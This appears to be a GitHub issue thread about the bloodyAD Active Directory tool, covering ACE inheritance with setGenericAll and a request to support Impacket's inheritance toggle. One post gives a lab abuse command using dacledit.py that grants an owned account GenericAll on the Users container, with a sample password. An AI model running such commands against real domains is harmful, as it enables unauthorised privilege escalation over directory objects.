Closed jsdhasfedssad closed 1 year ago
Inheritance is enabled by default using setGenericAll. So, if you give to your user genericAll right on a container using setGenericAll it should give to your user a genericAll on all the objects contained by the container.
However, bloodyAD doesn't have yet an ACL editor included to do more targeted right attribution.
Aha. I did not know that. I tested it and it works. Great!
Hi,
In case you have not already seen this. Impacket can now toggle inheritance on containers and OUs. This makes it possible to exploit objects in those containers or OUs as long as they do not have "AdminCount" set to "1" or higher. Would it be possible to support this in BloodyAD?
Successful abuse example in my lab:
1) Automatically backup the current ACE, grant your owned account GenericAll rights on the container "Users" and enable ACE inheritance on the container "Users": python3 examples/dacledit.py -inheritance -action write -principal [name of user with write rights] -target-dn 'CN=[container name],DC=[first part of domain name],DC=[second part of domain name]' '[domain]/name of user with write rights]:[password]'
For example "python3 examples/dacledit.py -inheritance -action write -principal domainuser1 -target-dn 'CN=USERS,DC=ADLAB,DC=LOCAL' 'adlab.local/domainuser1:Passw0rd!'".
Thanks!